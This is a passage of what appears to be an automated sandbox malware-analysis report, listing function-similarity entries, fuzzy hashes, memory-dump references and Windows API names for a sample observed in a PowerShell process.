                                                                                        • Opcode Fuzzy Hash: d6d94da02e8cd90508f8c5309ad9ffaf61e439cbbe2c4c0beee08b07978d7d82
                                                                                        • Instruction Fuzzy Hash: 287128615083968BD7158F39845437BFFE19FA3204F0885BEE5E69B382D32DCD0A8766
                                                                                        APIs
                                                                                        • RtlExpandEnvironmentStrings.NTDLL(00000000,?,0000001F,00000000,00000000,?), ref: 005185BC
                                                                                        • RtlExpandEnvironmentStrings.NTDLL(00000000,?,0000001F,00000000,00000000,?), ref: 005186FF
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000008.00000002.4460827755.00000000004F1000.00000020.00000400.00020000.00000000.sdmp, Offset: 004F0000, based on PE: true
                                                                                        • Associated: 00000008.00000002.4460787915.00000000004F0000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000008.00000002.4461817124.000000000052F000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000008.00000002.4461883407.0000000000532000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000008.00000002.4462000591.0000000000540000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_8_2_4f0000_powershell.jbxd
                                                                                        Similarity
                                                                                        • API ID: EnvironmentExpandStrings
                                                                                        • String ID: XY^
                                                                                        • API String ID: 237503144-2925192336
                                                                                        • Opcode ID: 587443d7113d404e3dbb98eba594c85c9a07fad2d16b944c8a05acc206b3acae
                                                                                        • Instruction ID: 85c0e60ac02ce1535aea6620f7aab1eea91e4dbfbcbe559d7c68045a086cd30d
                                                                                        • Opcode Fuzzy Hash: 587443d7113d404e3dbb98eba594c85c9a07fad2d16b944c8a05acc206b3acae
                                                                                        • Instruction Fuzzy Hash: B26122F1A042119FD354CF69C892B96BFB2FB45304F2680ADD5069F3A6CB758842CBC5
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000008.00000002.4460827755.00000000004F1000.00000020.00000400.00020000.00000000.sdmp, Offset: 004F0000, based on PE: true
                                                                                        • Associated: 00000008.00000002.4460787915.00000000004F0000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000008.00000002.4461817124.000000000052F000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000008.00000002.4461883407.0000000000532000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000008.00000002.4462000591.0000000000540000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_8_2_4f0000_powershell.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: ")*+$EZSM$EZSM$IK
                                                                                        • API String ID: 0-2209472741
                                                                                        • Opcode ID: 2374851c3c1bf3c44df29401ed7b1d39e7f5be968b2162de2f37f1b32f1798bc
                                                                                        • Instruction ID: db928f52909d46ae7ff464aaa6fb443fbdbe4c6f9bafaea7e60e85fd86178fd7
                                                                                        • Opcode Fuzzy Hash: 2374851c3c1bf3c44df29401ed7b1d39e7f5be968b2162de2f37f1b32f1798bc
                                                                                        • Instruction Fuzzy Hash: 9CD128B16083588BC314DF24C8512ABBBE3ABC1305F18892DE5D98F356D679C919C78B
                                                                                        APIs
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000008.00000002.4460827755.00000000004F1000.00000020.00000400.00020000.00000000.sdmp, Offset: 004F0000, based on PE: true
                                                                                        • Associated: 00000008.00000002.4460787915.00000000004F0000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000008.00000002.4461817124.000000000052F000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000008.00000002.4461883407.0000000000532000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000008.00000002.4462000591.0000000000540000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_8_2_4f0000_powershell.jbxd
                                                                                        Similarity
                                                                                        • API ID: MetricsSystem
                                                                                        • String ID:
                                                                                        • API String ID: 4116985748-3916222277
                                                                                        • Opcode ID: e5b1c4ad6f6a1e61ce263cfb7984e2df4e22f4a1fc3cd3e463386aa6d0f63735
                                                                                        • Instruction ID: bad20537356236b6d087dd1f06e7e84e360c88346cc374f36db86a38aab22b01
                                                                                        • Opcode Fuzzy Hash: e5b1c4ad6f6a1e61ce263cfb7984e2df4e22f4a1fc3cd3e463386aa6d0f63735
                                                                                        • Instruction Fuzzy Hash: 824184B0D142198FCB40EFACE99569DBBF0BB88304F10956EE498E7354D734A948CF92
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000008.00000002.4460827755.00000000004F1000.00000020.00000400.00020000.00000000.sdmp, Offset: 004F0000, based on PE: true
                                                                                        • Associated: 00000008.00000002.4460787915.00000000004F0000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000008.00000002.4461817124.000000000052F000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000008.00000002.4461883407.0000000000532000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000008.00000002.4462000591.0000000000540000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_8_2_4f0000_powershell.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: CONM$ZG@R$^WWM$n\]^
                                                                                        • API String ID: 0-2610027754
                                                                                        • Opcode ID: 591ffc7b09c35e483fb464b544dbfdc0dae8d1493b2e166ea01d12a762078980
                                                                                        • Instruction ID: 2691b79fe1c8cdc0dafb9a6349205300b42376b5943b6f76b56cc41ac26f0860
                                                                                        • Opcode Fuzzy Hash: 591ffc7b09c35e483fb464b544dbfdc0dae8d1493b2e166ea01d12a762078980
                                                                                        • Instruction Fuzzy Hash: 415148B5A0C3458BE730CE6484813EBBBE2FF51344F15992ED5D587341E238D985DB92
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000008.00000002.4460827755.00000000004F1000.00000020.00000400.00020000.00000000.sdmp, Offset: 004F0000, based on PE: true
                                                                                        • Associated: 00000008.00000002.4460787915.00000000004F0000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000008.00000002.4461817124.000000000052F000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000008.00000002.4461883407.0000000000532000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000008.00000002.4462000591.0000000000540000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_8_2_4f0000_powershell.jbxd
                                                                                        Similarity
                                                                                        • API ID: InitializeThunk
                                                                                        • String ID: C$Q-=5$Q-=5
                                                                                        • API String ID: 2994545307-3019679163
                                                                                        • Opcode ID: 8323e3f2af8a14b33578934f2c7b5e7995ec5c4fb0ff124f198ba291b76feebd
                                                                                        • Instruction ID: 7f4f45bc24317ec6724eb95d31fd5cb7e902079d4d809b7bf6f72f47661b026a
                                                                                        • Opcode Fuzzy Hash: 8323e3f2af8a14b33578934f2c7b5e7995ec5c4fb0ff124f198ba291b76feebd
                                                                                        • Instruction Fuzzy Hash: A8325A725083518FD7248F28DC9067FBBE2FFDA315F19896CE5C2872A2D6349906CB91
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000008.00000002.4460827755.00000000004F1000.00000020.00000400.00020000.00000000.sdmp, Offset: 004F0000, based on PE: true
                                                                                        • Associated: 00000008.00000002.4460787915.00000000004F0000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000008.00000002.4461817124.000000000052F000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000008.00000002.4461883407.0000000000532000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000008.00000002.4462000591.0000000000540000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_8_2_4f0000_powershell.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: A;45$E?C9$VJ
                                                                                        • API String ID: 0-2546191082
                                                                                        • Opcode ID: e7cbe2a2fa0db5ee3342a7a3e82ca1a9f795faff59a93a0ff2e1d81171dec1bc
                                                                                        • Instruction ID: 8b90b680228326a86578373c6505e5b58677fbcc9a7a70394af84eba9b94a5cf
                                                                                        • Opcode Fuzzy Hash: e7cbe2a2fa0db5ee3342a7a3e82ca1a9f795faff59a93a0ff2e1d81171dec1bc
                                                                                        • Instruction Fuzzy Hash: 14C1C1B15183108BD724DF24C86276BBBF1FFD5750F088A2CE8968B7A4E7799801CB52
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000008.00000002.4460827755.00000000004F1000.00000020.00000400.00020000.00000000.sdmp, Offset: 004F0000, based on PE: true
                                                                                        • Associated: 00000008.00000002.4460787915.00000000004F0000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000008.00000002.4461817124.000000000052F000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000008.00000002.4461883407.0000000000532000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000008.00000002.4462000591.0000000000540000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_8_2_4f0000_powershell.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: 36058DC784D611A1962CEBBDF1A894EB$<$]
                                                                                        • API String ID: 0-2827881798
                                                                                        • Opcode ID: 4cc38ef61de487f7e9678722fcb822fe70a8f8e99d5e8df3bf0753058aab7a82
                                                                                        • Instruction ID: f7f4a83a4449c6ae8dd575221eb0acbba89cccc63071f0af6efb92a29f8ee9ca
                                                                                        • Opcode Fuzzy Hash: 4cc38ef61de487f7e9678722fcb822fe70a8f8e99d5e8df3bf0753058aab7a82
                                                                                        • Instruction Fuzzy Hash: B9C113B160C3448BE718DF65C89177FBBE2EB82314F14492DE5D58B391DA38C90ACB5A
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000008.00000002.4460827755.00000000004F1000.00000020.00000400.00020000.00000000.sdmp, Offset: 004F0000, based on PE: true
                                                                                        • Associated: 00000008.00000002.4460787915.00000000004F0000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000008.00000002.4461817124.000000000052F000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000008.00000002.4461883407.0000000000532000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000008.00000002.4462000591.0000000000540000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_8_2_4f0000_powershell.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: 6|tx$flfc$ndnk
                                                                                        • API String ID: 0-3367617581
                                                                                        • Opcode ID: 73a2c750a5ab461c6b34d52c3d7fced69f80920193fe15c97b9060d034f11a94
                                                                                        • Instruction ID: 4cad303eab1afa2ce9effc4541a77e14d2937c09ea3d0217f597d6d4b93b1d96
                                                                                        • Opcode Fuzzy Hash: 73a2c750a5ab461c6b34d52c3d7fced69f80920193fe15c97b9060d034f11a94
                                                                                        • Instruction Fuzzy Hash: 7B816AB5C0460ACFDB108F68EC9167EBBB0FF5A314F044168E811AB3A2E734A851CF90
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000008.00000002.4460827755.00000000004F1000.00000020.00000400.00020000.00000000.sdmp, Offset: 004F0000, based on PE: true
                                                                                        • Associated: 00000008.00000002.4460787915.00000000004F0000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000008.00000002.4461817124.000000000052F000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000008.00000002.4461883407.0000000000532000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000008.00000002.4462000591.0000000000540000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_8_2_4f0000_powershell.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: ==Vg$>:<*
                                                                                        • API String ID: 0-3611967697
                                                                                        • Opcode ID: 3b416a3f6b731d6a3d2cded67b9979dc33f0a1d58cb7d9b688c72e06725abbd4
                                                                                        • Instruction ID: ddce4ca554ecd36a54f1432424b5c29112341b39090c9dd0f8e5d21e5c512722
                                                                                        • Opcode Fuzzy Hash: 3b416a3f6b731d6a3d2cded67b9979dc33f0a1d58cb7d9b688c72e06725abbd4
                                                                                        • Instruction Fuzzy Hash: 49C156B150C344CBD7049F24AC912BBBBE4BF96304F5848BDE5C28B351E339EA498B52
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000008.00000002.4460827755.00000000004F1000.00000020.00000400.00020000.00000000.sdmp, Offset: 004F0000, based on PE: true
                                                                                        • Associated: 00000008.00000002.4460787915.00000000004F0000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000008.00000002.4461817124.000000000052F000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000008.00000002.4461883407.0000000000532000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000008.00000002.4462000591.0000000000540000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_8_2_4f0000_powershell.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: &7$J9&
                                                                                        • API String ID: 0-952755115
                                                                                        • Opcode ID: a4653a8d410ad82a1b3f8114747008022ae784bc05dddb28f48bc60ec54f7a10
                                                                                        • Instruction ID: df7a874ed99b98487a91c2724c417da4badc46647e713ae07bd8d47f8a24e098
                                                                                        • Opcode Fuzzy Hash: a4653a8d410ad82a1b3f8114747008022ae784bc05dddb28f48bc60ec54f7a10
                                                                                        • Instruction Fuzzy Hash: CB515277A493104BD718DF796D4210BBFE2AED6218F2EC93CE4C997352EA3884068742
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000008.00000002.4460827755.00000000004F1000.00000020.00000400.00020000.00000000.sdmp, Offset: 004F0000, based on PE: true
                                                                                        • Associated: 00000008.00000002.4460787915.00000000004F0000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000008.00000002.4461817124.000000000052F000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000008.00000002.4461883407.0000000000532000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000008.00000002.4462000591.0000000000540000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_8_2_4f0000_powershell.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: N${}
                                                                                        • API String ID: 0-601268450
                                                                                        • Opcode ID: ddc733091bcf54132d8d129ab6869ddf4005bd704a619f535216f5cba75c4c88
                                                                                        • Instruction ID: 0455cdfef6e846657627e348a3b9a26eca83351276ae4727214b8b568474fca1
                                                                                        • Opcode Fuzzy Hash: ddc733091bcf54132d8d129ab6869ddf4005bd704a619f535216f5cba75c4c88
                                                                                        • Instruction Fuzzy Hash: A66134B59083048BD710DF24D8916ABBBF1FFD2354F08992CE8C59B391E7788945CB92
                                                                                        APIs
                                                                                        • RtlExpandEnvironmentStrings.NTDLL(00000000,?,0000001F,00000000,?,?), ref: 0051878C
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000008.00000002.4460827755.00000000004F1000.00000020.00000400.00020000.00000000.sdmp, Offset: 004F0000, based on PE: true
                                                                                        • Associated: 00000008.00000002.4460787915.00000000004F0000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000008.00000002.4461817124.000000000052F000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000008.00000002.4461883407.0000000000532000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000008.00000002.4462000591.0000000000540000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_8_2_4f0000_powershell.jbxd
                                                                                        Similarity
                                                                                        • API ID: EnvironmentExpandStrings
                                                                                        • String ID:
                                                                                        • API String ID: 237503144-0
                                                                                        • Opcode ID: fe134776ee8671548cb461ad7626ed82f9e496928b8eb37b71d19be4a68128d8
                                                                                        • Instruction ID: 66c255af03b77a1bc46887da2de438ac82a454cd754c3f9b0c80ef15fae56b40
                                                                                        • Opcode Fuzzy Hash: fe134776ee8671548cb461ad7626ed82f9e496928b8eb37b71d19be4a68128d8
                                                                                        • Instruction Fuzzy Hash: CB224771E04215DFEB14CFA8EC816BE7BB2BF59310F184568E512AB392CB356D45CBA0
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000008.00000002.4460827755.00000000004F1000.00000020.00000400.00020000.00000000.sdmp, Offset: 004F0000, based on PE: true
                                                                                        • Associated: 00000008.00000002.4460787915.00000000004F0000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000008.00000002.4461817124.000000000052F000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000008.00000002.4461883407.0000000000532000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000008.00000002.4462000591.0000000000540000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_8_2_4f0000_powershell.jbxd
                                                                                        Similarity
                                                                                        • API ID: InitializeThunk
                                                                                        • String ID: f
                                                                                        • API String ID: 2994545307-1993550816
                                                                                        • Opcode ID: 9101cae2479f6d97a05a68ae13ded138acdcdce693d70019a90d0eb9f6893636
                                                                                        • Instruction ID: 87755969343aaaff39a1197b294bc4d9784c3bc24ca3d1e841c45a38590f540c
                                                                                        • Opcode Fuzzy Hash: 9101cae2479f6d97a05a68ae13ded138acdcdce693d70019a90d0eb9f6893636
                                                                                        • Instruction Fuzzy Hash: 3012C0716083518FD714CF28E890A2BBBE1FF9A314F284A2CE495972E1D771E845DB92
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000008.00000002.4460827755.00000000004F1000.00000020.00000400.00020000.00000000.sdmp, Offset: 004F0000, based on PE: true
                                                                                        • Associated: 00000008.00000002.4460787915.00000000004F0000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000008.00000002.4461817124.000000000052F000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000008.00000002.4461883407.0000000000532000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000008.00000002.4462000591.0000000000540000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_8_2_4f0000_powershell.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: "
                                                                                        • API String ID: 0-123907689
                                                                                        • Opcode ID: f61a6243f4cbaaea40e29a2da2abc90fb35a9a8f0511b884f7581cc5ca6e41bf
                                                                                        • Instruction ID: d0e5e262cca7ef924d937533589335e5f70c2efdc534d6c0377277822007d5ae
                                                                                        • Opcode Fuzzy Hash: f61a6243f4cbaaea40e29a2da2abc90fb35a9a8f0511b884f7581cc5ca6e41bf
                                                                                        • Instruction Fuzzy Hash: 40D1F472A083159FE714DE2494A07EBBBEABFC5314F08892DE89987281E734DD84C7D1
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000008.00000002.4460827755.00000000004F1000.00000020.00000400.00020000.00000000.sdmp, Offset: 004F0000, based on PE: true
                                                                                        • Associated: 00000008.00000002.4460787915.00000000004F0000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000008.00000002.4461817124.000000000052F000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000008.00000002.4461883407.0000000000532000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000008.00000002.4462000591.0000000000540000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_8_2_4f0000_powershell.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: '
                                                                                        • API String ID: 0-2503692993
                                                                                        • Opcode ID: f9ec4f7172da01c56efe9f0694eb0b4466e5a69080d068201c1168f78f0f33f0
                                                                                        • Instruction ID: 8b75db673a351d0d130f7be7c8f92a774a012efde214908f79c22e6fb553abd5
                                                                                        • Opcode Fuzzy Hash: f9ec4f7172da01c56efe9f0694eb0b4466e5a69080d068201c1168f78f0f33f0
                                                                                        • Instruction Fuzzy Hash: 0931257540C3498BC708CF10DC505BBB7E0EF96308F549A5DE99A97361E338DA46CB8A
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000008.00000002.4460827755.00000000004F1000.00000020.00000400.00020000.00000000.sdmp, Offset: 004F0000, based on PE: true
                                                                                        • Associated: 00000008.00000002.4460787915.00000000004F0000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000008.00000002.4461817124.000000000052F000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000008.00000002.4461883407.0000000000532000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000008.00000002.4462000591.0000000000540000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_8_2_4f0000_powershell.jbxd
                                                                                        Similarity
                                                                                        • API ID: InitializeThunk
                                                                                        • String ID: @
                                                                                        • API String ID: 2994545307-2766056989
                                                                                        • Opcode ID: fa93da8d40e58594136383875233949d85015b27729adf55bbea0a73edbf549b
                                                                                        • Instruction ID: 5dd66e43bbf45f8ce62244cd2ad1b2c8cde89af064742749e1202ad73f2c1eee
                                                                                        • Opcode Fuzzy Hash: fa93da8d40e58594136383875233949d85015b27729adf55bbea0a73edbf549b
                                                                                        • Instruction Fuzzy Hash: 6831F5715083049BC314DF68E8C166BBBF5FF9A314F14892CE69983391D3359908CBA2
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000008.00000002.4460827755.00000000004F1000.00000020.00000400.00020000.00000000.sdmp, Offset: 004F0000, based on PE: true
                                                                                        • Associated: 00000008.00000002.4460787915.00000000004F0000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000008.00000002.4461817124.000000000052F000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000008.00000002.4461883407.0000000000532000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000008.00000002.4462000591.0000000000540000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_8_2_4f0000_powershell.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 8275701c67ffcdef42314cf6aac8146e3a3a9fb9feff6f897104d6e0b4cef448
                                                                                        • Instruction ID: 8b3305b9be33f65fa460ae0e37f25638276775a6b2412b097739fe2e576dd1dd
                                                                                        • Opcode Fuzzy Hash: 8275701c67ffcdef42314cf6aac8146e3a3a9fb9feff6f897104d6e0b4cef448
                                                                                        • Instruction Fuzzy Hash: 67221176A08225CFC718CF68E89056ABBF2FF9E315F0984ADD58697391D730A805DB90
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000008.00000002.4460827755.00000000004F1000.00000020.00000400.00020000.00000000.sdmp, Offset: 004F0000, based on PE: true
                                                                                        • Associated: 00000008.00000002.4460787915.00000000004F0000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000008.00000002.4461817124.000000000052F000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000008.00000002.4461883407.0000000000532000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000008.00000002.4462000591.0000000000540000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_8_2_4f0000_powershell.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 59bd3ac10152b41f7203c92da80cbf251157702d529506726a99bc29232755d8
                                                                                        • Instruction ID: 4aafbf5049952da080325e30a198608556759876fc50184fd86f8c44599ff76c
                                                                                        • Opcode Fuzzy Hash: 59bd3ac10152b41f7203c92da80cbf251157702d529506726a99bc29232755d8
                                                                                        • Instruction Fuzzy Hash: AE22E53160C3198BD724DF18D8806BBB3E1EFC5319F29892EDA8697381D73CA955CB46
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000008.00000002.4460827755.00000000004F1000.00000020.00000400.00020000.00000000.sdmp, Offset: 004F0000, based on PE: true
                                                                                        • Associated: 00000008.00000002.4460787915.00000000004F0000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000008.00000002.4461817124.000000000052F000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000008.00000002.4461883407.0000000000532000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000008.00000002.4462000591.0000000000540000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_8_2_4f0000_powershell.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: ed1986c41ceb7e1aa6cfed2d7a34c6fce3fce2841d2d0718dccdb3db6e423fc6
                                                                                        • Instruction ID: 3cf02c0296f99b1264230feab311ba48708a8c40ed353bbfc141c8eb3c16d14d
                                                                                        • Opcode Fuzzy Hash: ed1986c41ceb7e1aa6cfed2d7a34c6fce3fce2841d2d0718dccdb3db6e423fc6
                                                                                        • Instruction Fuzzy Hash: CE121075B08214CFC718CF68E8905AABBF2FF8E315F0984ADD58697391D734A805DB50
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000008.00000002.4460827755.00000000004F1000.00000020.00000400.00020000.00000000.sdmp, Offset: 004F0000, based on PE: true
                                                                                        • Associated: 00000008.00000002.4460787915.00000000004F0000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000008.00000002.4461817124.000000000052F000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000008.00000002.4461883407.0000000000532000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000008.00000002.4462000591.0000000000540000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_8_2_4f0000_powershell.jbxd
                                                                                        Similarity
                                                                                        • API ID: InitializeThunk
                                                                                        • String ID:
                                                                                        • API String ID: 2994545307-0
                                                                                        • Opcode ID: 640865aa95954e33267ad031012a5bb9de43f3afe8a6f14ee3eed9e0adaaf029
                                                                                        • Instruction ID: 22f8340c6dcef054dd740e9704e3aa9f3edd8455f24c6da75739d70810942c8a
                                                                                        • Opcode Fuzzy Hash: 640865aa95954e33267ad031012a5bb9de43f3afe8a6f14ee3eed9e0adaaf029
                                                                                        • Instruction Fuzzy Hash: 10F1FF31A18202CFD718CF28EC5166AB7E1FB98310F49897CE995C73A1D738EA65DB40
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000008.00000002.4460827755.00000000004F1000.00000020.00000400.00020000.00000000.sdmp, Offset: 004F0000, based on PE: true
                                                                                        • Associated: 00000008.00000002.4460787915.00000000004F0000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000008.00000002.4461817124.000000000052F000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000008.00000002.4461883407.0000000000532000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000008.00000002.4462000591.0000000000540000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_8_2_4f0000_powershell.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 06e3ad24755db8db5524fccc0f4f88cff4eef2b11246252438ef1b7477e7035d
                                                                                        • Instruction ID: 52a5d89837610448ab9d2fed4cc2d171e84cc705a5b655c1459165d3580b0b03
                                                                                        • Opcode Fuzzy Hash: 06e3ad24755db8db5524fccc0f4f88cff4eef2b11246252438ef1b7477e7035d
                                                                                        • Instruction Fuzzy Hash: 09F10075A08225CFC718CF78E8905AABBF2FF8E315F1984ADD58697391D730A805DB50
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000008.00000002.4460827755.00000000004F1000.00000020.00000400.00020000.00000000.sdmp, Offset: 004F0000, based on PE: true
